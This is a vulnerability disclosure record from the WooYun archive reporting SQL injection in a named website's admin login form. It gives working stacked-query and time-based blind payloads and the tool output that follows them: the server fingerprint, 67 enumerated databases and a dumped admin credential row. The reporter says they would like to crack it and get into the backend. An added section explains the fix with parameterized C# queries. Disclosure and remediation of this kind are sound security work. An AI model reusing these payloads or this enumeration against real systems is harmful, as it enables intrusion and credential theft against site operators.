WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
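2015-05-11: Details reported to the vendor; awaiting vendor handling
2015-05-11: Vendor confirmed; details disclosed to the vendor only
2015-05-21: Details disclosed to core white hats and experts in related fields
2015-05-31: Details disclosed to regular white hats
2015-06-10: Details disclosed to intern white hats
2015-06-25: Details disclosed to the public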
233
http://fx.mgyun.com/main/admin/login.aspx (POST)

Button1=&TextBox1=rrNqPVs&TextBox2=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAASHJB/7/ES5qw7oTlLMoJSqESCFkFW/RuhzY1oLb/NUVB2nXP6dhZn6mKtmTGNHd3PN%2bDvxnwFeFeJ9MIBWR693zA7sPhuVp7oyUWjddbTxrKvSqmddzonSdJITSPdfViA%3d&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGSUmCpyWWbsdK/7soAnkm/NxYDeJrd4mcNVYdeEDZxzSA%3d%3d

Parameter textbox1, reference payload: rrNqPVs';WAITFOR DELAY '0:0:5'--

---
Parameter: TextBox1 (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Button1=&TextBox1=rrNqPVs';WAITFOR DELAY '0:0:5'--&TextBox2=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAASHJB/7/ES5qw7oTlLMoJSqESCFkFW/RuhzY1oLb/NUVB2nXP6dhZn6mKtmTGNHd3PN+DvxnwFeFeJ9MIBWR693zA7sPhuVp7oyUWjddbTxrKvSqmddzonSdJITSPdfViA=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGSUmCpyWWbsdK/7soAnkm/NxYDeJrd4mcNVYdeEDZxzSA==

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: Button1=&TextBox1=rrNqPVs' OR 9245=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'fgsi'='fgsi&TextBox2=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAASHJB/7/ES5qw7oTlLMoJSqESCFkFW/RuhzY1oLb/NUVB2nXP6dhZn6mKtmTGNHd3PN+DvxnwFeFeJ9MIBWR693zA7sPhuVp7oyUWjddbTxrKvSqmddzonSdJITSPdfViA=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGSUmCpyWWbsdK/7soAnkm/NxYDeJrd4mcNVYdeEDZxzSA==
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
available databases [67]:
[*] AnalyzeSystem
[*] ApkGrabDB
[*] AppCoolPoints
.............

Database: AnalyzeSystem
[7 tables]
+------------+
| Admin      |
| Functions  |
| Group      |
| Manager    |
| MenuConfig |
| Model      |
| ModelGroup |
+------------+

The admin password was obtained from here.

Table: Admin
[1 entry]
+---------+---------+--------------------+----------+----------------------------------+
| AdminID | GroupID | DateLine           | AdminPwd | AdminName                        |
+---------+---------+--------------------+----------+----------------------------------+
| 1       | 0       | 09 25 2012 3:43PM  | 薍Ꝿꅻٴ塔 | 3f85cffcdcf****a8a3b66cd47f7afed |
+---------+---------+--------------------+----------+----------------------------------+

Unfortunately I haven't cracked it yet, otherwise I'd really like to get into the admin backend and take a look! I expect there is plenty of information in there!
~~
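The remediation for the TextBox1 injection reported above, as an added example that is not part of the original report and not the site's own code: the concatenated query shape a stacked-query finding implies, beside a parameterized form. The field, table and column names are taken from the report; the query text, column types and lengths, and the idea that a password hash is compared are assumptions.

```csharp
// Added example (not the vendor's code). TextBox1, Admin, AdminName and AdminPwd
// appear in the report; the query shape, types and lengths are assumptions.
using System;
using System.Data;
using System.Data.SqlClient;

public static class AdminLogin
{
    // Vulnerable shape (assumed): input is concatenated into the statement text.
    // A quote in TextBox1 closes the string literal, and anything after ';' is
    // run by SQL Server as a second statement, which is what the report shows.
    public static string BuildUnsafe(string name, string pwdHash)
    {
        return "SELECT AdminID FROM Admin WHERE AdminName = '" + name +
               "' AND AdminPwd = '" + pwdHash + "'";
    }

    // Hardened: the statement text is a constant; input travels only as typed
    // parameter values and is never parsed as SQL.
    public static SqlCommand BuildSafe(string name, string pwdHash)
    {
        var cmd = new SqlCommand(
            "SELECT AdminID FROM Admin WHERE AdminName = @name AND AdminPwd = @pwd");
        cmd.Parameters.Add("@name", SqlDbType.NVarChar, 64).Value = name;
        cmd.Parameters.Add("@pwd", SqlDbType.NVarChar, 128).Value = pwdHash;
        return cmd;
    }

    public static void Main()
    {
        // The reference payload quoted in the report, used as test input.
        string input = "rrNqPVs';WAITFOR DELAY '0:0:5'--";

        // Unsafe: the payload becomes part of the statement text.
        Console.WriteLine(BuildUnsafe(input, "x"));

        // Safe: the statement text is unchanged; the payload is only a value.
        SqlCommand cmd = BuildSafe(input, "x");
        Console.WriteLine(cmd.CommandText);
        foreach (SqlParameter p in cmd.Parameters)
            Console.WriteLine("{0} = {1}", p.ParameterName, p.Value);
    }
}
```

Parameterization closes the injection itself. The 67 databases enumerated in the output also suggest the application's SQL login can see far more than a login page needs, so scoping that login to its own database limits the impact of any remaining flaw.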
Severity: Medium
Vulnerability Rank: 7
Confirmed: 2015-05-11 14:21
Thank you for the feedback.
None yet